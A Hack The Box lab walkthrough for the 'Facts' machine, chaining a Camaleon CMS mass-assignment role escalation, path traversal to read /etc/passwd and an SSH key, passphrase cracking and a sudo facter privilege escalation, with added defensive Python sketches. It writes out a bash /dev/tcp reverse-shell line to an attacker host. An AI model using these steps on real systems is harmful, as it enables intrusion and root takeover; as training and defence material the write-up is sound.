
Hack The Box - Facts Walkthrough

Overview

| Item | Details |
| --- | --- |
| Platform | Hack The Box |
| Machine | Facts |
| Difficulty | Easy |
| OS | Linux |
| Created By | LazyTitan33 |
| Release Date | 31 January 2026 |
| Pwn Date | 14 February 2026 |

HTB Machine


Facts was released as part of Hack The Box Season 10. If you focus on the available CVEs related to the target, you can easily pwn Facts.
All you need is good recon on the target and familiarity with the common files found on a Linux system; that will get you into the machine. Then check which services we can run as root without a password. That'll do the magic 🪄.

Enumeration

Let's start with open ports and services enumeration.
Nmap Scan

Take note of the services, the SSH algorithm used, and the HTTP service information.

Accessing the IP in a browser triggered an error. We need to add the domain name to our "/etc/hosts" file.
Host Added in /etc/hosts

Let's visit the website and explore.
Web Page

For additional information, perform directory enumeration.

ffuf -u http://facts.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt -fw 1328 -r
Directory Enumeration

I did try some credentials on the /admin/login page but couldn't log in.
Login Page

So, to explore the website's functionality, create a user and log in.
Registration Page

Logged In

Capturing User Flag

The website is built with Camaleon CMS version 2.9.0. That is important information to start with. Do OSINT on this CMS and version, and we'll be able to find some CVEs released for it.
One reported issue is a mass assignment vulnerability, which is useful for getting administrative access to the website.

Reference:
https://github.com/advisories/GHSA-rp28-mvq3-wf8j
https://medium.com/@iamkumarraj/mass-assignment-vulnerability-in-camaleon-cms-2-9-0-ajax-privilege-escalation-9a09c8253b52

Let's use the change password option in the edit profile section.
Profile Edit Section

Change password function

Use Burp Suite to intercept the request and response of the password change functionality.
Original Request

Now alter the request body by including an extra parameter, password[role]=admin. As you can see, we get a success response.
Modified Request

Password Change Success

Now if you reload, you will find some new functionality enabled for your profile.
Admin Functionalities Enabled
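
Why the extra parameter works, and what the server-side fix looks like, as an added Python sketch (not Camaleon's code and not from the original post). Only password[role] comes from the walkthrough; the other field names, the values and the user record are assumptions.

```python
from urllib.parse import parse_qsl

# Constructed request body. Only password[role] comes from the walkthrough;
# the other field names and all values are assumptions.
TAMPERED_BODY = (
    "password%5Bpassword%5D=NewPass123"
    "&password%5Bpassword_confirmation%5D=NewPass123"
    "&password%5Brole%5D=admin"
)
ALLOWED_FIELDS = {"password", "password_confirmation"}


def nested_params(body, scope):
    """Collect scope[field]=value pairs from a form-encoded body."""
    prefix, fields = scope + "[", {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key.startswith(prefix) and key.endswith("]"):
            fields[key[len(prefix):-1]] = value
    return fields


def update_vulnerable(user, body):
    """Mass assignment: every submitted attribute is copied onto the record."""
    return {**user, **nested_params(body, "password")}


def update_hardened(user, body):
    """Apply only allowlisted attributes; return the rejected ones for logging."""
    submitted = nested_params(body, "password")
    rejected = sorted(set(submitted) - ALLOWED_FIELDS)
    accepted = {k: v for k, v in submitted.items() if k in ALLOWED_FIELDS}
    return {**user, **accepted}, rejected  # password hashing omitted here


if __name__ == "__main__":
    user = {"username": "tester", "role": "client"}  # hypothetical record
    print(update_vulnerable(user, TAMPERED_BODY)["role"])
    print(update_hardened(user, TAMPERED_BODY))
```

The rejected list is worth logging: a role field arriving on a password-change endpoint is a clear signal of tampering.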

So after getting admin privileges on the website, I started exploring. I checked different features and tried to exploit them.
I thought we might get a reverse shell through a file attachment in the pages option, but that didn't work. The uploaded content is stored in a static environment, where it gets downloaded instead of executed when accessed.

Pages feature

Page creation

Uploaded php reverse shell file

I started searching for other vulnerabilities found in Camaleon CMS. There is a path traversal vulnerability in the Media section, where all uploaded content is viewed.
Media Section

Reference:
https://securitylab.github.com/advisories/GHSL-2024-182_GHSL-2024-186_Camaleon_CMS/

So let's confirm our finding by fetching the "/etc/passwd" file.
Path traversal

/etc/passwd file

From this we can confirm two things: the path traversal vulnerability exists, and which users are available.

Using the exploit we can easily capture the user flag.
User Flag Captured

Capturing Root Flag

After capturing the user flag, I started wandering around the directories, targeting some general files. I targeted the id_rsa file so that I could access the target through SSH.
id_rsa file not available

But the thing I missed here is that SSH is using a different encryption algorithm, not RSA (that's why I asked you to note the SSH algorithm at the beginning).
SSH Encryption

Got the private key

Here we got the SSH private key of the user trivia. If you decode it, you can see in the header that it is encrypted, with bcrypt as the key derivation function.

echo "ssh-key" | tr -d '\n' | base64 -d | xxd | head
Decoded SSH Key
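
What the xxd output is showing, as an added Python example (not from the original post): a parser for the openssh-key-v1 header that reports key type, cipher, KDF and bcrypt rounds, which is also a quick way to audit whether keys at rest are passphrase-protected. The sample keys are constructed headers with a zero-filled public key and no private section; ssh-ed25519, aes256-ctr and 16 rounds are assumed values, not taken from the target.

```python
import base64
import struct

MAGIC = b"openssh-key-v1\x00"


def _s(data):
    """Encode bytes as an SSH wire string (uint32 length prefix)."""
    return struct.pack(">I", len(data)) + data


def _read(buf, off):
    """Decode one SSH wire string, returning (bytes, next offset)."""
    (length,) = struct.unpack_from(">I", buf, off)
    end = off + 4 + length
    if end > len(buf):
        raise ValueError("truncated key blob")
    return buf[off + 4:end], end


def inspect_openssh_key(pem_text):
    """Report key type, cipher, KDF and rounds without touching key material."""
    lines = [ln for ln in pem_text.strip().splitlines() if not ln.startswith("-----")]
    blob = base64.b64decode("".join(lines))
    if not blob.startswith(MAGIC):
        raise ValueError("not an openssh-key-v1 blob")
    cipher, off = _read(blob, len(MAGIC))
    kdf, off = _read(blob, off)
    kdfopts, off = _read(blob, off)
    pubkey, _ = _read(blob, off + 4)  # skip the uint32 key count
    key_type, _ = _read(pubkey, 0)
    rounds = None
    if kdf == b"bcrypt":  # kdfoptions = string salt, uint32 rounds
        _salt, pos = _read(kdfopts, 0)
        (rounds,) = struct.unpack_from(">I", kdfopts, pos)
    return {"key_type": key_type.decode(), "cipher": cipher.decode(),
            "kdf": kdf.decode(), "rounds": rounds, "encrypted": cipher != b"none"}


def build_sample(cipher, kdf, kdfopts):
    """Constructed header only: zero-filled public key, no private section."""
    pub = _s(b"ssh-ed25519") + _s(bytes(32))
    blob = MAGIC + _s(cipher) + _s(kdf) + _s(kdfopts) + struct.pack(">I", 1) + _s(pub)
    b64 = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


SAMPLE_PROTECTED = build_sample(b"aes256-ctr", b"bcrypt", _s(bytes(16)) + struct.pack(">I", 16))
SAMPLE_UNPROTECTED = build_sample(b"none", b"none", b"")
```

The key type field explains why looking for id_rsa fails when the key is not RSA, and a cipher of none means the file is usable by anyone who can read it.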

Now let's crack it using John the Ripper.
Cracked!

The password we found: dragonballz

Using the private key and the password, log in as the user trivia.
Logged in as trivia

Now let's perform simple checks that can be used for privilege escalation.
If you execute sudo -l, you can see that /usr/bin/facter can be run with sudo without entering a password.
Facter with sudo privs

You can confirm it with facter -p command.

Reference:
https://docs.oracle.com/en/operating-systems/solaris/oracle-solaris/11.4/use-puppet/gathering-information-system-using-facter.html

facter command checking

Now let's check if we can execute something as root.
Executed as root

As the result confirms, we executed the command as root. Now let's try to capture the root flag from the root directory using the following commands.

trivia@facts:~$ echo -e '#!/bin/bash\necho rootflag=$(cat /root/root.txt)' > /tmp/rootflag  
trivia@facts:~$ chmod +x /tmp/rootflag  
trivia@facts:~$ sudo /usr/bin/facter --external-dir=/tmp rootflag

Explanation:
- First we create a script file, rootflag, which contains the bash command for printing root.txt. Facter only displays values in key=value format, so we changed the command to rootflag=$(cat /root/root.txt) instead of just cat /root/root.txt.
- Next we give execute permission to the file /tmp/rootflag.
- Then we execute facter with sudo. The --external-dir option is used for loading external facts from a directory. Here facter checks for executable files in the /tmp directory and displays their output.

Root Flag Captured!
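
How this shows up to a defender, as an added Python example (not from the original post): a scan of sudo log lines for facter runs that load facts from user-writable directories. The log lines are constructed in the standard sudo syslog format, and the list of writable prefixes is an assumption to adapt per host.

```python
import re
import shlex

# Constructed sudo syslog lines (timestamps, TTYs and the last two commands are made up).
SAMPLE_LOG = """\
Feb 14 10:01:12 facts sudo:   trivia : TTY=pts/0 ; PWD=/home/trivia ; USER=root ; COMMAND=/usr/bin/facter -p
Feb 14 10:03:40 facts sudo:   trivia : TTY=pts/0 ; PWD=/home/trivia ; USER=root ; COMMAND=/usr/bin/facter --external-dir=/tmp rootflag
Feb 14 10:05:02 facts sudo:   trivia : TTY=pts/0 ; PWD=/home/trivia ; USER=root ; COMMAND=/usr/bin/facter --external-dir /dev/shm x
Feb 14 10:06:30 facts sudo:   trivia : TTY=pts/0 ; PWD=/home/trivia ; USER=root ; COMMAND=/usr/bin/ls /root
"""

SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$")
DIR_FLAGS = ("--external-dir", "--custom-dir")
WRITABLE_PREFIXES = ("/tmp", "/var/tmp", "/dev/shm", "/home")  # assumed policy


def fact_dirs(argv):
    """Extract directories passed as --flag=DIR or --flag DIR."""
    dirs = []
    for i, arg in enumerate(argv):
        for flag in DIR_FLAGS:
            if arg.startswith(flag + "="):
                dirs.append(arg.split("=", 1)[1])
            elif arg == flag and i + 1 < len(argv):
                dirs.append(argv[i + 1])
    return dirs


def find_suspicious_facter(log_text):
    """Return (user, directory, command) for root facter runs loading facts from writable paths."""
    hits = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if not m or m["runas"] != "root":
            continue
        argv = shlex.split(m["cmd"])
        if not argv or not argv[0].endswith("/facter"):
            continue
        for d in fact_dirs(argv[1:]):
            if d.startswith(WRITABLE_PREFIXES):
                hits.append((m["user"], d, m["cmd"]))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_facter(SAMPLE_LOG):
        print(hit)
```

Because facter runs the executables it finds in the external facts directory, a sudo rule that allows facter with arbitrary arguments is equivalent to granting root, so the durable fix is in the sudoers policy and this check only surfaces use of it.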

We successfully captured the root flag. But let's create an interactive shell as root.

trivia@facts:~$ echo -e '#!/bin/bash\necho shell=$(bash -p -i >& /dev/tcp/<attacker-ip>/<port> 0>&1)' > /tmp/nc  
trivia@facts:~$ chmod +x /tmp/nc  
trivia@facts:~$ sudo /usr/bin/facter --external-dir=/tmp nc

Now start a netcat listener on your device and get the reverse shell.
Triggering reverse shell as root
Shell as root

We successfully Pwned Facts🎉.
Machine Completed

The Valentine's Day Special 💝.